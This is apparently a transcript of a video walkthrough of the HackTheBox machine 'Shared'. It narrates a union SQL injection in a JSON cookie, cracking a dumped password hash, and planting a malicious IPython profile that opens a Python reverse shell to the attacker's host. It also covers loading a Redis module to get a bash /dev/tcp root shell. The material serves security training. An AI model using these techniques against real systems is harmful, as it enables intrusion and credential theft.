What's going on YouTube? This is Ipsec. I'm doing shared from HackTheBox, which I really enjoyed. It had three main steps. The first one was finding a SQL injection in an e-commerce platform that happened during the checkout. And the unique thing here is the SQL injection happened in a cookie and it was within a JSON payload. So you had to be careful not to break the JSON by not using double quotes. But once you do all that, the SQL injection is relatively straightforward. You get some credentials to SSH in from the database. And then you can escalate to a different user using kind of like a path injection type vulnerability. iPython older versions would load the profile from the current working directory. So you create a malicious iPython profile, and then when a user ran iPython from that directory, you'd get code execution on them. And then the final exploit of this box was just a simple Redis one. You had to reverse a golang binary, which you don't really reverse. So you can just have it connect back to any netcat session, get the password, and then you log into Redis and you can use that to execute code. So with all that being said, let's jump in. As always, we start off with an nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it shared, and then the IP address of 10.10.11.172. This can take some time to run, so I've already ran it. Looking at the results, we have a few ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. Then we have HTTP on port 80. It's running Nginx 1.18, and also HTTPS on 443, also running Nginx 1.18. And it is leaking a SSL certificate of star.shared.htb. So right off the bat, we know there is going to be a hostname of shared.htb. And if we try to access the page, we can see it redirects to this page. So what I'm going to do is just copy this and add it into my host real quick. So sudo vi etc host, and then we can do 10.10.11.172 shared.htb. And I'm just going to go to HTTPS 10.10.11.172. And we want to accept the certificate. And that redirects us to shared.htb as our nmap said. So accept this certificate, and we get in. So the first thing I want to do is take a look at the page. So we see a link that says My Store, and they're talking about downtime here. Also, there's a new checkout process. So typically in CTFs, whenever they say this is a new thing, we should definitely look into it, as it says. But I always look at the entire picture before I go digging down any rabbit holes. We do see it is powered by PrestaShop. And I know that is just a open source project. So I'm going to Google PrestaShop GitHub and go over to the page to check out a little bit more about this. And we can see it is PHP. And one of my favorite things to do is try to see if I can figure out the version of the open source app that's running, because it helps so much when it comes to finding vulnerabilities. So I'm going to try INSTALL.TXT, and we can see they have left this behind. And we're looking at this string installation instructions for PrestaShop 1.7. And if I look at the install.txt, we can see it says PrestaShop 8. So right off the bat, we know we have a different version here. So we can go over to the history and try to figure out which commit our install.txt is at. I'm going to try going to this remove Presta trust, and they're removing these strings, find modules and themes. So I'm just going to check that exists here. So this commit has not happened yet. So we can go back, look at it. I'm looking at maybe improve install doc. Let's see. I'm looking for a good link that has this. So I guess to install, it's looking for HTTPS. So let's see what this link says. It's HTTPS, so we know this GitHub commit has happened. I think that was improve install doc. So let's see. Use correct protocol in install.txt. What is this? This is talking about crowd.in using HTTPS. This is this. So we know this change has made it. This remove this one did not, right? Because find module and themes was in it. Yeah. So this is the commit we're at, which is March 8th, 2021. So we're somewhere between these two commits. So whenever we look for a CVE, we want to go somewhere between that. So if I just search Presta, let's see, we have a block wishlist module, and this, a time-based, and these could be potential, right? So this is a CVE 2022. Since it says module, I'm going to guess this is an add-on. This is a CVE 2020, or version from 2021, so I'm going to ignore that. And then this one, 1.770, this doesn't have a CVE tied to it, but it seems if this takes 5 seconds, then it's going to be vulnerable. Let's just paste this, see how long this takes. That did not take 5 seconds. So I'm going to guess this one is an older CVE as well. And I say 5 seconds because I'm looking at the sleep 5 right there. And then this block wish list, let's see. PS underscore for tables. Yeah, this is a plugin for it. So I'm going to guess this isn't vulnerable potentially. So we'll just save that one if we ever come across a plugin instead of keeping going down different holes. So let's go back and just take a look at the new checkout process. So what I'm going to do is try to buy something. So I'm going to get this shirt, add it to my cart, proceed to checkout, and then proceed to checkout. And we get an error because it's taking us to checkout.shared.htb. So let's add this to a host. So checkout.shared.htb. Refresh the page. We get a certificate error. Accept it. And it's got product, quantity. Oh, they used a comma instead of a period. It threw me off. I was like, this shirt is $23,000, but no. It's asking for some credit card data and a payment. So let's do 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4, and then 1, 2, 3. I'm going to intercept this just so we can see what the request looks like when we pay. And this doesn't even make a request. So I don't think we're supposed to do anything there because nothing's making a request. I don't know exactly how the product got translated into this. So let me take Burp Suite off real quick so we can quickly go back a few pages. So when we added this to the cart, it put a product in that I would assume says Hummingbird t-shirt in our cart, but it's saying like 5G something. So I don't know where that is. I'm guessing this may be like the item ID. So if we press F12, go into storage, we can look at our cookies, and there is a custom cart cookie. And if I edit this cookie, let's see. Actually, before we edit, let's put this in Burp Suite so it's easier to see. So intercept is on. Burp Suite. Refresh the page. We can see this custom cart. If I highlight the text, Burp Suite automatically decodes it. And we can see it's decoded to 53GG2EF8, which is what is displayed. So I'm going to, let's see, can I edit just straight in this? Oh, I can. Let's change this to please subscribe. So I'm putting please subscribe in the cookie. And then we're going to send it. And I should have done that on this page. So please subscribe. Click apply changes for this request. And the product is not found. So it is doing some type of database lookup on that product, which makes sense because if we did the legitimate product, let's see, it pulls the quantity and the price. There's nothing about quantity and price in a cookie. The cookie only has the item name. So it looks like there may be some type of SQL injection in here. So I'm just going to put a single quote, and then we can say, actually, let's revert our cookie. So if we go to repeater, Control Z to revert, I'm going to put a single quote here, apply, send it. And what we want to look for is, let's see, if I do this and always search here, I wonder if it will be easily find not found. Auto scroll. Send. Yep. So this gets us here, so we're just looking at that. Where we have the item name and then a single quote, I'm going to do dash dash plus dash, which is a plus, I think comes into a space. Let's do %20. There we go. So plus isn't getting URL decoded, but %20 is also a space. So if I do dash dash space, we see it now works. So this is definitely going to be SQL injectable. Now, we could try Union. We probably will have to URL encode this. Select 1, 2, 3. Oh, we don't have to URL encode it. So we don't even need the %20. That could just be a straight space. But we definitely have Union injection here. If I change this item to be something that doesn't exist, so it starts at 53, so this is going to be the item. I'm just going to put does not exist. And now we can see our union let us exfil some data. So where the 2 is, we can do at version. And we see it put the SQL version here. So now we have complete SQL injection on this application. We could be incredibly lazy and just copy this request to a file and then use it for, what is it? SQLMap. So if we wanted to do that, we just copy it. This is called shared, and this will be checkout.request, I guess. And if I do a ls, we have it here. The one thing we'll want to do to help SQLMap is go into the cookie, and we don't have to do this. We could like specify level 5 risk 3, I believe, and it would just automatically work, but take a long time. If you ever know where a SQL injection is, you can tell SQLMap it's where the star is. So if I put a star here, it should automatically pick this up and try SQL injection there. And this is just the squiggly bracket, then a quote, then a star, a quote, other squiggly bracket, or comma right there. But so SQLMap, checkout, we can specify -r for checkout request. We want to force SSL because this is a HTTPS site. And I can say technique is equal to U for union, and then -- batch. And I think that's enough to tell it where it is. And you can see it found the custom injection marker, and it did not inject. Let's see what this looks like. Let's cat checkout.request. Want to copy this. Go to Burp Suite's decoder, paste it. That looks fine. Let's see. Risk 5, level 3. I put those backwards. Risk 3, level 5. And I'll just let that go. We'll go and do it manually while that runs. So let's see. We have the version here. So what we want to do is a subquery. So I'm going to put it in quotes right away. And we can do select group concat. And the reason why I'm doing group concat is because I want to put multiple rows on one line. And I think this is schemata. I think that's going to be the table name or database name from information schema.schemata. Let's see, information schema. Maybe schema name. Is that the table? Yep, that's it. So I would just be going to like the MySQL help page or documentation to pull all this stuff out if I struggle. If you don't understand this, definitely check out IPsec Rocks. There is a machine called Union that I did that explains this whole Union injection thing I'm doing much better than I'm doing now. But we can see there is a database name checkout. So my next step is table name, then a single colon, and we'll do column name from information schema dot columns, where schemata is, I'll just do like checkout. 0 rows matched. No products in cart. Oh, my cookie's bad. We have double quotes here. This is in some JSON. Let's see. Schema name. Okay, I don't have that memorized. So let's do MySQL information schema table. See, no matter how many times you do this, always end up forgetting something. So let's see, table reference, columns, table underscore schema, or yeah, where table schema. There we go. Documentation always helps. So we have a list of tables here, and SQLMap did not find it. Maybe in the, after we pop this box, we'll take a look at it. So v tables, let's replace that. We want to replace comma with return. There we go. So we want to get the username and password out of the user table. So what we can do, go back here, change this to be username, this to be password, and we can change this to just be from user. And we have a user here, James Mason, and then a hash. So let's grab this. V users, put this, and that looks like an MD5 sum, just because it looks like 32 characters. But to be safe, check it out. It is. So let's go to CrackStation, I guess. And if this doesn't come up with a result, then I would switch over to Hashcat and try to crack it. But sometimes this is faster, depending whether or not I can pass this test, which I can. And we have a password of Solil101. So let's copy this, and I'm going to try SSH James underscore Mason at 10.10.11.172. And then I'm also going to try James after this. But looks like that worked. So that was the password. We can look at other users on this box. So let's grep for anything that ends in SH. And we have root, James Mason, and Dan Smith, which doesn't really help us at all. I mean, we know an extra user on the box. The only extra tidbit of information I'm seeing here that I think most people may miss out on is we have this field. This is the user ID info field. It's just a comment for the user where you can put just generic information. So we just have the first name and then a bunch of commas. I'm guessing that's because this is UID 1000, which means James Mason was the user that the installer had created. So the very first thing I check with that is like what groups I'm a member of to see if I'm in like the LXC group or other things. I am a member of developers, so we should check that out in a minute. But we don't see Dan Smith with that. I'm guessing it was created with like the user add command. So yeah, I guess other fields here we see commas, but you generally have like first name, last name, phone number, address, things like that. So nothing too interesting. We can do a find / group developer and then pipe errors to dev null to see what is here. And we can also add a -ls. So we see permissions. There is this opt script review folder. If I ls it, we don't see anything interesting. There is a timestamp of July 14th on this script review. So I'm going to check the file system for files modified between July 13th and 15th. So let's do find / and then newer MT for newer modified time and do July 13th and then do a not. So it's saying the time is greater than the 13th and not greater than the 15th. And then again, pipe errors to dev null. And we need newer MT here. We didn't get an error message because we hid them, right? So we want newer MT like that. That's getting data. So let's hide all errors. And we have a lot of files. So let's take a look at them. I'm going to also add the -ls thing so we can see earners and things. Interesting enough, we do have the Dan Smith. We can go in his home directory and get some things. So that is interesting. Looking at other things, nothing interesting in D package. We do have a bunch of files in the www directory. So we probably should get some credentials out of this. So let's go var www. Is there anything in HTML? An index.php? That's interesting. It's just telling it to move to the shared.htb. So let's go into this. There is a PS folder, which probably is PrestaShop. And then let's go to config, grep-i-r pass for password. And what I want to do is find the password. I'm going to do less-s just because I hate line wrapping. Let's see. I'm guessing passwords are good for 360 days, minimum length of 8. I don't see the password, but we do have this variable database_password. I'm going to go up a directory and we're going to grep for that. So grep for database password. Let's hide error messages. And that's much more manageable. So install and upgrade.php we can ignore. We have, why didn't we see this? There's two config directories apparently. There's config and then app config. And inside app config, we do have this password. So I'm going to grab this. Actually, let's take a look at the file to get the username. So let's copy this. We less it. And we can see where is database password right here. And the user is PrestaShop or pshop. So let us save this. vcreds.txt, pshop, this, MySQL shared. Okay. And then there was another web server and checkout. I'm guessing these credentials are the same because they went to the same database, but doesn't hurt to check, right? Looks like a different password. So we have this user as checkout. So let's do checkout, put this password, and this will be MySQL checkout. And when we did this SQL injection, we were the checkout user. So what I'm going to do is do a MySQL-u, pshop-p for password. And I'm going to log in with this just to look at the databases available because maybe there's an extra database and it doesn't look like there is. The theory there was when we did the SQL injection, we did it on the checkout page and we saw the databases available to checkout. I want to make sure there's no database available to PrestaShop that wasn't available to checkout. Nothing there. So we can go into the home directory. There is Dan Smith. there was a .ssh, but only Dan Smith can access it. So let's try an SU as Dan Smith, and we can try the 2 credentials that we have. So let's copy this, paste it in. Looks like that's going to fail. We can try the other credential as well. So SU dash Dan Smith, paste in the password, and it looks like that fails as well. So there is this iPython directory, so I'm going to go into it. There is a profile default, and first, let's just see if we can write to anything in this directory. Whenever you can write to a Python's, or not Python, a program's profile, you may be able to get it to execute code. And the only thing that is writable is bash history, so nothing really there. And bash history is pointed to dev null, so can't even view that file. So let's go into IPython, profile default. There is a history.SQLite. So let's do a strings history.SQLite. And looking at it, it looks like IPython is running every single minute. Because we just see this increment. Oddly enough, it didn't run between 09, like we're missing 10 and 11 here, but it's still running. Is there anything in log? Nothing in log. So we can check the IPython version, and we see it is version 8. So let's see, is there any IPython 8.00 RCE? See if there's any way to get code execution. A GitHub advisory, and it's saying IPython will execute a profile that's in the current working directory. So we don't know where IPython is running. We know it's opening every single minute, but we don't know its directory. Is it staying open? If I grep for IPython, we don't see it. So we have to run like pspy or something to show me processes every minute. What I'm going to do instead is we'll do it with LinPeas. And the reason why I'm doing this is because we've shown pspy 100 times. Let's do it a little bit more interesting. If I go to LinPeas, I always like downloading the latest. So let's save it to my disk. And then we can make dir dub, and go in here and move LinPeas, downloads linpeas.sh. to my directory, and by default, it's not going to run the check. So we can see by here, this fast check, we can see fast, do not check 1 minute of processes and do an SU brute force. So I'm going to remove that. So we remove the default, and now LinPeas will check for processes. So let's do python 3-m http server, and we can execute it. So curl 10.10.14.8, port 8000, linpeas.sh, pipe it over to bash. Curl not found. Let's try, is it wget-q-O for standard, write file to standard out? Linpeas.sh not found, because I have linpeas.sh.sh. There we go. Now LinPeas is running. So this is going to take a while. I'm probably going to pause the video and we'll just look at it when it's done, because we know it's going to take at least 1 minute because it's got the fast mode disabled. And the whole reason I disabled it in the file itself instead of just passing it as a parameter, because when I'm executing LinPeas this way with like wget or curl without touching disk, it's hard to pass parameters in. So I find it's just easiest to modify the script itself. So yeah, I'm going to pause the video because we see it's now doing a bunch of checks that may take a while. One interesting thing I just noticed while LinPeas was running, we have this one check. It's looking for passwords inside of key folders, and it did not find the password for us, which is odd. So you can't always depend on these automated tools to find passwords, because we know there are 2 passwords in these key folders. It's definitely going in var dub because we have the PrestaShop folder right here. And it didn't find the config.php password in checkout, which is interesting because that was relatively easy, and didn't find the one in the app config. And I'm Not surprised I didn't find that one because it was a bit hidden. So maybe one day I'll look at exactly how it determines what a password is, what a password actually is, because that logic can definitely be improved upon since it's not finding them. But I'm going to pause the video again and we'll just wait for this to finish because LinPeas is still running. And there we go. LinPeas has finally finished. The one thing we really cared about was iPython, so I'm just going to search the terminal for that. We can see it found SQLite files, and it tried to extract information. Nothing was in it, so nothing got extracted. We do have files inside of home directories, finding the history.sqlite that we found manually. Modified in the last 5 minutes. Of course, the SQLite history file was. And here we go. Different processes executed during the 1 minute. So we have cron starting, and then it's running a sleep. I'm guessing cron start sleep, maybe. Then we have root c.sh executing, and then iPython gets executed. And the first thing it does is pkill against iPython, go into cd opt scripts review, and execute iPython. So now we know the current working directory that iPython is ran out of. So if I just go in here, and we created a profile default directory, iPython presumably would start executing things out of that. I'm going to go into dev shm to do my work because I'm assuming there's a cleanup script that's cleaning this script review directory. So I'm just going to create it in here, and then we will copy it over. So if a cleanup script happens, we don't lose any of our data. So the first thing we want to do is we do 2 make drs. I'm just going to do 1, and instead of doing both of them, I'm going to do -p for create the parent as well. It's doing it in temp. Let's just do it in my current directory. So if I do lsla, we see profile default, and then we see a startup directory. And what I want to do is create any Python file here. So I'm going to create shell.py, and I'm going to Google Python reverse shell. And then let's go to payload all the things. And we'll just copy and paste the Python payload from here. So go to Python. Here's a payload. We can copy this, paste it in. We can make it pretty by saying all semicolons are now returns. And then we can say the IP is going to be 10.10.14.8, which is my IP. And then the port is 9001. Okay. So let's go up to directories. We can do nclvnp 9001. And what I want to do is copy. Actually, before I do this, I'm just going to run iPython here. Because if I did it correct, I should get a shell, right? There we go. So let's quit. Let's do this again. And cp-r profile default in opt script review. Look at the time, and in about 20 seconds, hopefully we get a reverse shell from Dan Smith. So another 10 to 15 seconds. And then the first thing I'm going to do with that shell is grab his key. So there is the shell. Let's go cd home, Dan Smith, go to SSH, and then cat ID RSA. So we have his private key. So grab this, enter to copy, and then dan.key, paste it in. And we could do like the normal PTY trick to upgrade our shell, but whenever you have SSH, use SSH just because it's much more reliable. So chmod sh-i dan.key Dan Smith at 10.10.11.172. And we get logged in as Dan. So looking at his directory, let's look at his groups. He is a member of sysadmin. So I'm going to do find /-group sysadmin to dev null to see what this user can use. And there is this Redis connector dev. So if I execute this, we get output. So it did something. Logging into Redis using password, and then it just outputs the info command, I guess. So what we want to do is try to get this password from this Redis connector. So if we do file against it, we can see it is going to be a golang binary. We could try stringsing it and less. And I don't think there's going to be any like easy to read strings in Golang. We just see bunches and bunches of these 4 or 5 characters things. So let's see. Man strings, strings-h. There's a minimum, right? Strings. I don't know what to do minimum string. Let's just change the encoding. Strings s on this. We have some of the packages it uses, but there's just so much information here. I don't think we're going to get anywhere just doing strings. So the quickest way I can think of it is running it against our local box. So let's SCP this file. So I'm going to do scp-i dan.key, then Dan Smith at 10.10.11.172. And let's copy this. So paste, and then r_dev to our current directory. So now that it's copied, we can just execute it, right? So chmod +x, redis dev, and we can't connect because nothing's listening on localhost 6379, which is the Redis port. I wonder what happens if we did just listen on that. Will it just output the password to us? I doubt it. It can't be that easy, right? So if I just execute it, we get auth, and then this. Is this going to be the password? Let's do Redis CLI auth username password. Username's in brackets, so I wonder if that means it may not be required. Let's just do this. Okay. Auth invalid. So honestly, that gets us logged in. So now that we're logged into the database, let's go over to Hacktricks and see if there's anything fun we can do with Redis. So there's this pen testing Redis page. And let's see. Basic information, automated. We have authentication. We can dump the database. So if we do info key space, let's do auth again. Info key space. It's blank. So nothing there. Redis RCE. I think this is going to be like an old version or something. Redis less than 505. I'm going to ignore this for now. May go back to it. Other things are overwriting files. Redis CI config. What is this? So this is writing a SSH key. This is writing a cron tab. We can try those in a second. This is loading a Redis module. I've never done this. Let's try this real quick. So what do we want to do? System exec. Is there a release? There isn't. Build Redis. Is this going to be a simple make? If it's a simple make, I'll do it. If it's going to be more complex, probably won't, because I'm guessing I may have to install a bunch of dependencies. We have module.so. So I think that was it. cp module.so. Up one directory. So now we can scp-i dan.key, Dan Smith at 10.10.11.172. We need to specify the file. Module.so. Okay. I'm going to authenticate again. And then we want to do, where's module load and then path. So module load, home, Dan Smith, module.so. And it says okay. So we should now be able to do system exec. And we can. So system exec ID. So now let's do bash-c, bash-i. Then, was it like this? Dev TCP 10.10.14.8, 9001, 0, and 1 like that. NC LVNP 9001. Run it. Unknown command system exec. Let's see. Is this still a command? System.exec ID. Weird. Let's authenticate again. So I wonder if Redis is like restarting something every minute or so. So we do that. Where's the module load command? It doesn't look like I have control R to do that. Do this. NCLVNP 9001. And there we go. We have a shell as root. So now I can do lsla, or we can go to /root and get root.txt. So I guess we should have put a SSH key because something's killing it every minute or so. But yeah, that's how you do the box. So hope you guys enjoyed that. Actually, sorry for the sloppy cut. I wanted to show you one thing, or maybe not show you. I wanted to figure out one thing. Why my SQLMap didn't work, because we have this checkout.request. And if I look at it, it looks fine. Like we're telling SQLMap to inject here. And this is going to be the, I'm just going to do it in less because I always have bad luck when I copy and paste out of Vim. But if I do this, we go to CyberChef. Let's load this up to do a URL decode. We can see it looks as we expect. Like this is where it's putting the SQL injection. But for some reason, it didn't work. So what I'm going to do is a -v to put this in verbose mode. And this should show me the queries it makes. Maybe not 1v. Let's do 2 Vs. We're going to do Vs until it shows us the information we want, right? I'm still not seeing union injections, so maybe it's 3 Vs. And here we go. We got payloads. So this is all the payloads it's doing to test for SQL injection. And I don't see anything that would tell me this is union injectable. I guess it's not putting a comment after this. And that, oh no, there is a comment. Huh. I wonder why that's not working. Because this should definitely work right now. What is 7b22? What is that? Okay, that is this. I wonder if it's cutting off the payload or it's just not displaying the rest of the payload. Let's see. What if I edit checkout request? Because we saw, like, if we just sent, like, this, put ASD where the star is, it would get not found. So I wonder if I prefix this with a valid cookie, or a valid thing. So I want to go to checkout.shared.htb. Where is it? Or I can probably go to repeater tab, hold Control-Z, so we get to the original payload. Well, let's copy this. Go to CyberChef. Going to copy this. Because now maybe SQLMap Oh god, not that. I'm hoping SQLMap will get some, like, its Boolean detection will be better if we prefix this with something valid. Not that. There we go. Finally pasted. Okay. Now we run this again. And still didn't find it. Let's see. Just for my own sanity, I want to paste this to make sure it is what I expect it to look like. That is exactly what I expected. So we can get rid of that change. It wasn't that. So it started with 5.3. Man, SQLMap, union. Is there a union column? Union not found. Is it a capital? Let's see. I'm going to tell it union. I think it's COL for columns. I'm going to tell it there's 3 columns. Does this work? It's doing a lot more. Injectable, exploitable with null value. So yeah, I think it works. So specifying the number of columns worked, which is odd, because here we see it's doing generic union 3 to 3 columns. If we go before, let's see, this should be it. It says 1 to 10 columns. So oddly enough, it never checked, I guess, 1 to 10 is my guess. Because we look at this, it's definitely saying it is injectable. So now we could do like -- dump and dump information, right? So that's how to do it through SQLMap. It's now attempting to crack the password, which I don't think it will do, or maybe it did. But now we have all the information out of the database. So hope you guys enjoyed that video. Take care, and I will see you all next time.